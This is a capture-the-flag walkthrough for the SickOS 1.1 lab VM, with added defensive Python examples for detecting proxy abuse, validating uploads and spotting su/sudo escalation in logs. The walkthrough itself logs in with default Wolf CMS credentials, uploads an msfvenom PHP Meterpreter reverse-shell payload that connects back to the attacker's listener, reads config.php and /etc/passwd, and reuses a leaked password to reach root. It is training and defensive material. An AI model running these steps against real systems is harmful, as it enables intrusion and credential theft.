Hack the SickOS 1.1 VM (CTF Challenge)

This time we are going to crack SickOS 1.1 from the Boot2root challenges. This CTF gives a clear analogy of how hacking strategies can be performed against a network to compromise it, in a safe environment. The objective is to compromise the network/machine and gain administrative/root privileges on it.

WalkThrough

We will start off by finding the target.

netdiscover

Our target IP is 192.168.0.101. Now we scan the IP with Nmap.

nmap -p- -A 192.168.0.101

The ports we found open are 22, 3128 and 8080. If you try to open the VM's web service in the browser at this point, nothing loads and you will find nothing. So, now we will use nikto.

nikto -h 192.168.0.101:3128

Nikto will help us find a text file called robots.txt. Let's try and open it in the browser.

This tells us something about /wolfcms, which means this website is made in Wolf CMS and/or there is a directory named /wolfcms. We tried to open it in the browser but failed. If you observed the nmap output, there was something about a proxy on port 3128. So we will set up a manual proxy in the browser: give the IP of the VM as the HTTP proxy and 3128 as the port.

After the proxy has been set up, open the website in the browser at the link: 192.168.0.101/wolfcms/
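From the defender's side, the lesson here is that the proxy on 3128 forwards requests to the host's own web service, so anything the proxy can reach is reachable by whoever can talk to the proxy. The following added example (my own code, not part of the original walkthrough) shows a small detection check over proxy access logs: it flags requests that were proxied to loopback, private or link-local addresses, or to the proxy host itself. It assumes a Squid-style native access.log layout (timestamp, elapsed, client, code/status, bytes, method, URL, ...), and the log lines are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample lines in a Squid-style native access.log layout
# (assumption: the proxy on 3128 logs in this format; lines are made up).
SAMPLE_ACCESS_LOG = """\
1420000001.101     45 192.168.0.103 TCP_MISS/200 2311 GET http://example.com/ - HIER_DIRECT/93.184.216.34 text/html
1420000002.202     12 192.168.0.103 TCP_MISS/200 5120 GET http://192.168.0.101/wolfcms/ - HIER_DIRECT/127.0.0.1 text/html
1420000003.303      9 192.168.0.103 TCP_MISS/403 512 GET http://127.0.0.1/robots.txt - HIER_DIRECT/127.0.0.1 text/plain
1420000004.404      7 192.168.0.103 TCP_MISS/200 812 GET http://localhost:8080/ - HIER_DIRECT/127.0.0.1 text/html
"""

LOCAL_NAMES = {"localhost", "localhost.localdomain"}


def is_internal_host(host: str) -> bool:
    """True when the requested host is loopback, private (RFC 1918) or link-local."""
    if host.lower() in LOCAL_NAMES:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name that is not a literal address; not treated as internal here.
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local


def parse_line(line: str):
    """Split one native-format access.log line into the fields we need."""
    fields = line.split()
    if len(fields) < 7:
        return None
    return {"client": fields[2], "status": fields[3],
            "method": fields[5], "url": fields[6]}


def find_internal_proxy_requests(log_text: str, proxy_addrs: set):
    """Return (client, url) for every request proxied to an internal host.

    proxy_addrs: the proxy's own addresses, so requests aimed at the proxy
    host itself (as in the walkthrough) are flagged as well.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        host = urlsplit(rec["url"]).hostname or ""
        if host in proxy_addrs or is_internal_host(host):
            hits.append((rec["client"], rec["url"]))
    return hits


if __name__ == "__main__":
    for client, url in find_internal_proxy_requests(SAMPLE_ACCESS_LOG, {"192.168.0.101"}):
        print(f"internal target via proxy: client={client} url={url}")
```

The mitigation is on the proxy itself: Squid's stock configuration already carries an `http_access deny to_localhost` rule and a `localnet` ACL so that only trusted source networks may use the proxy and none of them can reach the loopback interface through it; the detection above is for catching the cases where that configuration has been loosened.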

The page will open as above, indicating that it has been made in Wolf CMS. I don't know much about Wolf CMS, so I searched Google to find where the admin page resides.

Having found the login page through Google, I opened it. It asked for a username and password. By default the username and password are admin and admin respectively.

I used the default username and password and logged in to the page shown below. Here, select the Files tab and then the Upload files option.

Here we need to upload a malicious file. To generate it, open your terminal in Kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

Copy the code from <?php to die(); and paste it into a text file with the extension .php. Upload that file.
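Two weaknesses are being chained at this point: default admin credentials, and a file-upload feature that accepts a .php file into a web-served directory. The added example below (my own code, not Wolf CMS code) shows the kind of server-side upload check that blocks the second step: an extension allowlist, rejection of any server-side extension anywhere in the name (so double extensions like shell.php.png fail too), a magic-byte check for image/PDF types, and a scan for a PHP open tag in the content. The allowed and server-side extension sets are assumptions chosen for the example.

```python
import re
from pathlib import PurePosixPath

# Assumed allowlist for a CMS "files" area (example choice, not Wolf CMS policy).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}

# Extensions that common PHP handler configurations will execute (example list).
SERVER_SIDE_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".phps"}

# Leading bytes expected for the binary types we allow.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
    ".pdf": b"%PDF",
}

# Matches "<?php" and the "<?=" echo tag; bare "<?" short tags are not
# flagged because they collide with XML prologs.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def check_upload(filename: str, content: bytes):
    """Return (accepted, reason) for a candidate upload."""
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes:
        return False, "no extension"
    # Any server-side extension in the chain is rejected, not just the last one,
    # because some handlers execute "name.php.png" as PHP.
    if any(s in SERVER_SIDE_EXTENSIONS for s in suffixes):
        return False, f"server-side extension in {filename}"
    ext = suffixes[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext} not in allowlist"
    magic = MAGIC.get(ext)
    if magic and not content.startswith(magic):
        return False, f"content does not match {ext} signature"
    if PHP_TAG.search(content):
        return False, "PHP open tag found in content"
    return True, "ok"


if __name__ == "__main__":
    for name, data in [("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
                       ("shell.php", b"<?php echo 1; ?>"),
                       ("shell.php.png", b"\x89PNG\r\n\x1a\n")]:
        print(name, check_upload(name, data))
```

Even with this check in place, uploads should be stored outside the web root or in a directory where script execution is disabled, so that a bypass of the filename check does not become code execution.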

Now, before running the file, start multi/handler in Metasploit by typing:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.103

set lport 4444

exploit

As you hit enter, run the uploaded file too and you will get your session. Once you have it, drop to the shell and type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

After doing the above, you will be a user on our target. To see what files and directories are there, type:

ls

Then read the config.php by typing :

cat config.php

Reading the config.php file will give you all the details about the database, including the username and password, i.e. root and [email protected]3 respectively.

Moving further, read the password file; to do so, type:

cat /etc/passwd

Observe all the user details it gives us and you will find that user sickos has the value 1000:1000, which means this is the first user. So we might find our way in here, as it is the first user. Therefore, switch user to sickos with the password [email protected] that we found.

su sickos

Then type the following command to see the IDs:

id

Now we need root access, and for that type:

sudo -s

Give the password [email protected] again. To confirm that you are now root, type:

whoami
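The privilege escalation works because the database password from config.php is also the password of the first local user, and that user may run any command through sudo. Both steps leave traces in the system authentication log. The added example below (my own code, not part of the walkthrough) runs a simple detection over constructed auth.log lines: it flags a successful su that originates from a service account such as www-data, flags sudo invocations that open a root shell, and raises the severity when the sudo comes from a user that was just reached via su from a service account. The log lines, the hostname and the service-account list are assumptions made for the example.

```python
import re

# Constructed auth.log excerpt (sample data for this example, not taken from the VM).
SAMPLE_AUTH_LOG = """\
Dec  5 10:15:01 target su[2201]: Successful su for sickos by www-data
Dec  5 10:15:01 target su[2201]: + /dev/pts/0 www-data:sickos
Dec  5 10:15:40 target sudo:   sickos : TTY=pts/0 ; PWD=/var/www/wolfcms ; USER=root ; COMMAND=/bin/bash
Dec  5 11:00:00 target sudo:   admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt-get update
Dec  5 11:05:00 target su[2400]: Successful su for admin by admin
"""

# Accounts that should never be the source of an interactive su (assumed list).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "mysql"}

# Commands that amount to an interactive root shell when run via sudo.
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh"}

SU_RE = re.compile(r"su\[\d+\]: Successful su for (?P<target>\S+) by (?P<source>\S+)")
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=\S+ ; PWD=\S+ ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)


def detect_privilege_chain(log_text: str):
    """Return a list of findings (dicts) for the su/sudo patterns described above."""
    findings = []
    pivoted = set()  # users reached via su from a service account, in log order
    for line in log_text.splitlines():
        m = SU_RE.search(line)
        if m:
            if m["source"] in SERVICE_ACCOUNTS:
                pivoted.add(m["target"])
                findings.append({"severity": "medium", "rule": "su_from_service_account",
                                 "user": m["target"], "source": m["source"], "line": line})
            continue
        m = SUDO_RE.search(line)
        if m and m["runas"] == "root" and m["cmd"].split()[0] in SHELLS:
            # A root shell from an account that was just entered via su from
            # www-data is the full chain seen in the walkthrough.
            severity = "high" if m["user"] in pivoted else "low"
            findings.append({"severity": severity, "rule": "sudo_root_shell",
                             "user": m["user"], "command": m["cmd"], "line": line})
    return findings


if __name__ == "__main__":
    for f in detect_privilege_chain(SAMPLE_AUTH_LOG):
        print(f["severity"], f["rule"], f["user"])
```

Detection is the second line; the first is not to reuse the database password for a login account, and to give the local user a sudoers entry limited to the specific commands they need rather than unrestricted root.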

Furthermore, we need to go into /root to look for the flag, so run the following set of commands:

cd /root

ls

Here you will find a text file. Let's read it.

cat a0216ea4d51874464078c618298b1367.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.
